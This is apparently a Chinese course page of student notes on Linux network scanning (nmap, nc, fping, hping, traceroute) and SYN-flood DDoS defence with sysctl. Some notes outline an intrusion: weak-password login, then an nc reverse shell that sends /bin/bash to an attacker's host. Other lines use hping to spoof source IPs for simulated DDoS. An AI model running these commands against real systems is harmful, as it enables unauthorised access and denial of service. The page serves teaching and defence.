为了账号安全,请及时绑定邮箱和手机立即绑定
  • 1.网络入侵方式
    踩点,网络扫描,查点,提权等

    1. tracert命令tracert www.jd.com 查ip地址

    2. nmap命批量主机服务扫描令,得知某个路由里面的端口

    3. 尝试进行暴力破解,发现登陆内网http://10.202.4.73,是否能用弱口令进行登陆,例如:admin/admin

    4. 登陆到管理界面后,尝试用nc命令进行交互式shell操作,例如nc -10.68.104.6  2005 -e/bin/bash监听黑客的2005接口,并将目标机器的所有bash命令


  • SYN类型DDOS攻击:服务器接收到连接请求(syn=j),将此信息加入backlog未连接队列,导致队列满了丢弃掉正常的SYN请求,同时发送请求包给客户(syn=k,ack=j+1),进入SYN_RECV状态。当未收到客户端的确认包时,一直重发请求包,占用网络带宽,引起网络堵塞甚至系统瘫痪。

    减少syn和ack包的重试次数

        sysctl -w net.ipv4.tcp_synack_retries=3

        sysctl -w net.ipv4.tcp_syn_retries=3

    SYN cookies技术

        sysctl -w net.ipv4.tcp_syncookies=1

    增加backlog队列

         sysctl -w net.ipv4.tcp_max_syn_backlog=2048


    关闭ICMP协议请求

         sysctl -w net.ipv4.icmp_echo_ignore_all=1

  • netcat(nc)工具:在centos中通过yum search nc查找,然后安装。 nc -z -v -n -w2 172.31.100.7 21-25 可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为UDP。 z 参数在连接成功后立即关闭连接,不进行数据交换;v 参数指详细输出;n 参数表示不要使用DNS反向查询IP地址的域名。 这个命令会打印21到25所有开放的端口并且打印运行在这个端口上服务的banner信息。Banner是一个文本,是一个你连接的服务发送给你的文本信息。但是,并不是所有的服务都会发送banner。

  • 1、nmap -sP IP/24 查看这一段IP内哪个主机的开放的 ICMP协议类型 ping扫描 2、nmap -sS [-p 端口范围] IP 查看IP开发的TCP端口 TCP SYN扫描 tcp半开放扫描(没有建立三次握手)(不会被服务检测,例如Apache等) 默认扫描0-1024端口及一些常用端口 3、nmap -sT [-p 端口范围] IP TCP connect()扫描 TCP全开放扫描 4、nmap -sU IP UDP扫描 UDP协议扫描 有效透过防火墙策略

  • nmap -sP(ping扫描主机是否存活) x.x.x.0/24    <nmap -sP 61.135.169.0/24>

    nmap -sS(TCP半开放扫描) -p(指定端口扫描范围) [端口1]-[端口2] [目标IP]    <nmap -sS -p 0-30000 192.168.5.7>

    nmap -sT(TCP全开放扫描) -p(指定端口扫描范围) [端口1]-[端口2] [目标IP]    <nmap -sT -p 0-30000 192.168.5.7>

    nmap -sU(UDP扫描) -p(指定端口扫描范围) [端口1]-[端口2] [目标IP]    <nmap -sU -p 0-30000 192.168.5.7>

    tcp半开放扫描:发送SYN包但不建立第三次握手,不被目标服务发现 tcp全开放扫描:进行三次握手,建立tcp连接

  • 原理与traceroute一致,mtr另外可以看丢包率

  • 路由扫描:查询本机到另一个主机经过的路由跳数及数据延迟情况。 tracerpute原理:traceroute 送出一个TTL(生存时间)是1的UDP数据包(每次送的的是3个40字节的包,包括源地址,目的地址和包发出的时间标签)到目的地,当路径上的第一个路由器收到这个数据包时,它将TTL减1变为0,并送回一个ICMP数据包,表示UDP数据包已经执行;接着再送出另一个TTL为2的数据包,发现第二个路由器,然后一直重复执行该操作,直到某个数据包抵达目的地;因为它所选择送达的port number(30000以上)是一般应用程序都不会用的端口,所以在traceroute送出UDP数据包到目的地时,该目的主机会送回一个目的地址不可达的消息

  • hping 一 对制定端口发起TCP探测  二 伪造来源IP,模拟Ddos攻击

    Linux查看端口    netstat -l(监听)t(TCP)n(不显示主机名)    <netstat -ltn>

    Windows查看端口    netstat -ano

    hping -p [端口] -S(发送SYN包) [目标IP] 

    -a(伪造发送IP) [伪造IP]    <hping -p 22 -S 192.168.3.26 -a 192.168.3.27>

    修改Linux内核禁用ICMP报文    sysctl -w net.ipv4.icmp_echo_ignore_all=1

    查看经过某网络设备包信息    tcpdump -n(不把主机IP转换为名称) -p(不让网络界面进入混杂模式) -i[网卡名称] src host(只显示此IP包信息) [目标IP]   <tcpdump -np -ieth1 src host 192.168.3.56> 


  • hping安装依赖了libpcap和libpcap-devel。 make出现错误:net/bpf.h:没有那个文件或目录,未发现bpf-h,解决办法:ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h;/usr/bin/ld:cannot find -ltcl,解决办法:yum install tcl-devel;创建符号链接 "/usr/sbin/hping"文件已存在,解决办法:使用 rm -rf  /usr/sbin/hping* 删除。 make install之后,出现Can't install the man page: /usr/local/man/man8 does not exis

  • hping

    1、下载wget https://github.com/antirez/hping/archive/master.zip

    2、解压unzip master.zip

    3、安装依赖yum -y install gcc libpcap-devel tcl-devel

       当bpf.h找不到,建立软连接ln -sf /usr/include/pcap-bpf.h  /usr/include/net/bpf.h

    4、检查./configure,编译make,安装make install

    5、查看hping -v 查看版本信息


  • fping -a -g 192.168.1.1 192.168.1.255 (192.168.1.0/24)扫描主机段

  • fping 

    安装  wget www.fping.org

    ./configure    make   make install

    fping -a  批量主机扫描,只显示存活主机

  • tracert跟踪     nmap  批量主机端口扫描      nc -lvp 2005 监控2005端口 nc *.*.*.*(源地址) -e /bin/bash  登陆到管理界面,尝试用nc命令主动连接黑客的计算机并把/bin/bash环境传给黑客

  • 网络安全——网络扫描,查点,系统服务扫描

  • 1、下载wget https://github.com/antirez/hping/archive/master.zip

    2、解压unzip master.zip

    3、安装依赖yum -y install gcc libpcap-devel tcl-devel

       当bpf.h找不到,建立软连接ln -sf /usr/include/pcap-bpf.h  /usr/include/net/bpf.h

    4、检查./configure,编译make,安装make install

    5、查看hping -v 查看版本信息

    6、常用功能及参数

       ①:对特定的目标端口发起tcp探测

        -P 端口

        -S 设置TCP模式 SYN包

       ②:伪造来源IP,模拟Ddos攻击

        -a 伪造ip地址

    7、netstat -ltn 查看本机tcp监听的端口

    8、hping -p 22 -S ip  查看存活但屏蔽ICMP服务的主机


  • 减少syn和ack包的重试次数

    sysctl -w net.ipv4.tcp_synack_retries=3

    sysctl -w net.ipv4.tcp_syn_retries=3

  • 下载hping网址    http://github.com/antirez/hping/archive/master.zip

    安装开发库    Ubuntu:apt-get install libpcap-devel;CentOS:yum -y install libpcap-devel

    检测配置    ./configure

    编译源码    make

        如果报错      1.需要安装libpcap-devel
                            2.net/bpf.h: No such file or directory
                            建立软链接 ln -sf /usr/include/pcap-bpf.h /usr/include/net/bpf.h 
                            3./usr/bin/ld: cannot find -ltcl
                            yum -y install tcl-devel

    安装    make install


  • fping 命令参数: fping -h 查看fping命令的可用选项列表;-a 显示存活主机;-u 相反。 fping -g IP1 IP2(IP1是开始范围,IP2是结束范围); fping -f filename 读入文件中的IP进行扫描; fping IP1 IP2 IP3 ...

  • SYN类型DDOS攻击防御

    11:14
    看视频
  • nc -z(连接成功后立即关闭连接) -v(显示过程) -w(设置访问超时时间)[时间/秒]  [目标IP] [端口]    <nc -z -v -z -w2 10.10.56.7 1-100>

首页上一页1234567下一页尾页

举报

0/150
提交
取消
课程须知
1、有良好的Linux系统管理基础,Linux的基本命令、网络管理、软件包安装等等。 2、了解网络基础、TCP/IP通讯原理、一些基本的网络协议:ICMP、TCP、UDP。
老师告诉你能学到什么?
学习完本课程后,同学们可以了解如下内容: 1、能了解Linux系统常用的扫描分析手段,运用所学手段做网络故障的分析。2、了解SYN攻击原理、及什么是DDOS攻击,明白在Linux系统下通过有效的手段如何防治DDOS、SYN攻击。 3、增强安全意识,增加对系统安全的了解。
意见反馈 帮助中心 APP下载
官方微信